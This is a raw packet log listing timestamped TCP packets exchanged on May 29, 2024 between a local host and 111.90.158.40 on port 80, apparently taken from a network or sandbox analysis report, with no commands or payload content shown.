May 29, 2024 14:25:27.266741991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266753912 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266753912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266767979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266781092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266792059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266798973 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266805887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266818047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266823053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266855001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.315191984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315212965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315263987 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.315382004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315396070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315407991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315419912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315431118 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.315433025 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315445900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.315454960 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.315493107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.544394970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544430971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544450045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544461966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544472933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544492006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544502974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544512987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544524908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544537067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544538975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.544548035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544559002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544572115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544584036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544594049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544605017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544611931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.544616938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544631004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.544634104 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.544662952 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.544670105 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545234919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545248985 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545259953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545300961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545545101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545559883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545571089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545581102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545593977 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545594931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545614004 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545651913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545687914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545855999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545869112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545881033 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.545908928 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.545917034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546008110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546020985 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546032906 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546041965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546058893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546084881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546132088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546144009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546154976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546197891 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546442986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546453953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546498060 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546591043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546602964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546613932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546624899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546638012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546642065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546672106 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546700954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546746969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546757936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546799898 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.546955109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546967030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.546978951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547010899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547090054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547101974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547130108 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547233105 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547244072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547255039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547265053 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547271013 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547276974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547286987 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547291040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547305107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547316074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547319889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547327042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547338963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547370911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547382116 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547382116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547395945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547406912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547416925 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547418118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547441959 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547497034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547508001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547518015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547528028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547533989 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547549963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547632933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547643900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547677040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547792912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547830105 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.547955036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.547965050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548011065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548122883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548135042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548146009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548156023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548172951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548187017 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548273087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548284054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548295021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548305988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548319101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548333883 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548360109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548399925 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548412085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548437119 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548583984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548597097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548607111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548618078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548630953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548633099 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548660994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548670053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548719883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548732042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548743010 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548764944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548872948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548882008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548894882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.548904896 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548919916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.548949003 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549005032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549015045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549026966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549050093 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549160004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549170017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549180984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549195051 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549206018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549206018 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549220085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549225092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549251080 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549318075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549330950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549340010 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549352884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549357891 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549365044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549376965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549388885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549401999 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549432039 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549613953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549624920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549634933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549647093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549654961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549675941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549689054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549699068 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549701929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549726009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.549879074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.549915075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550036907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550046921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550056934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550066948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550077915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550088882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550095081 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550120115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550138950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550184965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550196886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550206900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550219059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.550230026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550270081 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550892115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.550978899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.626066923 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.626440048 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.626512051 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.631588936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631611109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631627083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631644964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631659985 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631680012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631696939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.631705046 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.631743908 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.822833061 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822865963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822890043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822902918 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.822906017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822921991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822938919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822942972 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.822956085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822971106 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.822973967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.822993994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823007107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.823214054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823247910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.823332071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823484898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823501110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823520899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.823611975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.823645115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.823887110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.825980902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.825995922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826011896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826024055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826028109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826046944 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826050997 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826062918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826080084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826085091 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826119900 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826284885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826301098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826316118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826337099 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826340914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826359987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826375008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826385975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826390982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826415062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826431036 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826436043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826452017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826457024 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826469898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826484919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826497078 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826500893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826519012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826524973 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826534986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826550961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826556921 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826567888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826582909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826600075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.826600075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.826622009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839160919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839211941 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839232922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839248896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839265108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839281082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839297056 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839298010 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839323044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839405060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839420080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839435101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839449883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839454889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839466095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839478970 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839482069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839498997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839504957 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839514971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839530945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839554071 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839554071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839570999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839577913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839592934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839602947 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839608908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839624882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839641094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839653969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839657068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839672089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839673996 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839689970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839700937 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839714050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839739084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839754105 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839754105 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839770079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839785099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839790106 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839801073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839816093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839829922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839845896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839864016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839864016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839869022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839875937 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839884996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839904070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839917898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839919090 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839934111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839951992 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839952946 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.839967966 CEST	80	49760	111.90.158.40	192.168.2.4
